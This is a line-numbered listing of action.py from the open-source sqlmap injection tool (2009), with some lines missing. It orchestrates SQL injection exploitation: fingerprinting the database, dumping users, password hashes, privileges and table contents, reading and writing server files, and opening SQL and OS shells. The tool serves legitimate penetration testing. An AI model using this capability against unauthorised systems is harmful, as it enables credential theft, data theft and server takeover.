4
$Id: action.py 327 2009-01-12 21:35:38Z inquisb $
6
This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
8
Copyright (c) 2006-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
9
and Daniele Bellucci <daniele.bellucci@gmail.com>
11
sqlmap is free software; you can redistribute it and/or modify it under
12
the terms of the GNU General Public License as published by the Free
13
Software Foundation version 2 of the License.
15
sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
16
WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
17
FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
20
You should have received a copy of the GNU General Public License along
21
with sqlmap; if not, write to the Free Software Foundation, Inc., 51
22
Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
27
from lib.controller.handler import setHandler
28
from lib.core.common import getHtmlErrorFp
29
from lib.core.data import conf
30
from lib.core.data import kb
31
from lib.core.dump import dumper
32
from lib.core.exception import sqlmapUnsupportedDBMSException
33
from lib.core.settings import SUPPORTED_DBMS
34
from lib.techniques.blind.timebased import timeTest
35
from lib.techniques.inband.union.test import unionTest
36
from lib.techniques.outband.stacked import stackedTest
41
This function exploit the SQL injection on the affected
42
url parameter and extract requested data from the
43
back-end database management system or operating system
47
# First of all we have to identify the back-end database management
48
# system to be able to go ahead with the injection
49
conf.dbmsHandler = setHandler()
51
if not conf.dbmsHandler:
52
htmlParsed = getHtmlErrorFp()
54
errMsg = "sqlmap was not able to fingerprint the "
55
errMsg += "back-end database management system"
58
errMsg += ", but from the HTML error page it was "
59
errMsg += "possible to determinate that the "
60
errMsg += "back-end DBMS is %s" % htmlParsed
62
if htmlParsed and htmlParsed.lower() in SUPPORTED_DBMS:
63
errMsg += ". Do not specify the back-end DBMS manually, "
64
errMsg += "sqlmap will fingerprint the DBMS for you"
66
errMsg += ". Support for this DBMS will be implemented if "
67
errMsg += "you ask, just drop us an email"
69
raise sqlmapUnsupportedDBMSException, errMsg
71
print "%s\n" % conf.dbmsHandler.getFingerprint()
75
dumper.string("stacked queries support", stackedTest())
78
dumper.string("time based blind sql injection payload", timeTest())
81
dumper.string("valid union", unionTest())
85
dumper.string("banner", conf.dbmsHandler.getBanner())
87
if conf.getCurrentUser:
88
dumper.string("current user", conf.dbmsHandler.getCurrentUser())
91
dumper.string("current database", conf.dbmsHandler.getCurrentDb())
94
dumper.string("current user is DBA", conf.dbmsHandler.isDba())
97
dumper.lister("database management system users", conf.dbmsHandler.getUsers())
99
if conf.getPasswordHashes:
100
dumper.userSettings("database management system users password hashes",
101
conf.dbmsHandler.getPasswordHashes(), "password hash")
103
if conf.getPrivileges:
104
dumper.userSettings("database management system users privileges",
105
conf.dbmsHandler.getPrivileges(), "privilege")
108
dumper.lister("available databases", conf.dbmsHandler.getDbs())
111
dumper.dbTables(conf.dbmsHandler.getTables())
114
dumper.dbTableColumns(conf.dbmsHandler.getColumns())
117
dumper.dbTableValues(conf.dbmsHandler.dumpTable())
120
conf.dbmsHandler.dumpAll()
123
dumper.string(conf.query, conf.dbmsHandler.sqlQuery(conf.query))
126
conf.dbmsHandler.sqlShell()
128
# File system options
130
dumper.string(conf.rFile, conf.dbmsHandler.readFile(conf.rFile))
133
dumper.string(conf.wFile, conf.dbmsHandler.writeFile(conf.wFile))
137
conf.dbmsHandler.osShell()